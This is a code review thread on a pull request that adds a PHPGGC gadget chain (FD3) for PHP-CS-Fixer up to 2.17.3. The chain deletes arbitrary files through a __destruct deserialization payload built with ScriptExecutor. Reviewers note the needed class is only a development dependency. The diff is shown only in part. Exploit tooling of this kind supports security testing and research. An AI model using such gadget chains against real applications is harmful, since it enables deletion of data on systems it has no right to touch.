gadgetchains/PHPCSFixer/FD/3/chain.php

```diff
@@ -0,0 +1,17 @@
+<?php
+
+namespace GadgetChain\PHPCSFixer;
+
+class FD3 extends \PHPGGC\GadgetChain\FileDelete
+{
+    public static $version = '<= 2.17.3';
+    public static $vector = '__destruct';
+    public static $author = 'CyanM0un';
+
+    public function generate(array $parameters)
+    {
+        $remote_path = $parameters["remote_path"];
+
+        return new \Keradus\CliExecutor\ScriptExecutor($remote_path);
```

Comment:
Class missing after: `composer require friendsofphp/php-cs-fixer=2.17.3`

Reply:
still by `composer create-project friendsofphp/php-cs-fixer=2.17.3 phpcsfixer`. I want to clarify that I'm not really that familiar with php development myself, so I'm not quite sure what the differences are between these building ways.

Reply:
keradus is included as a `require-dev` dependency of php-cs-fixer, which is why I couldn't see it. It generally will not be present.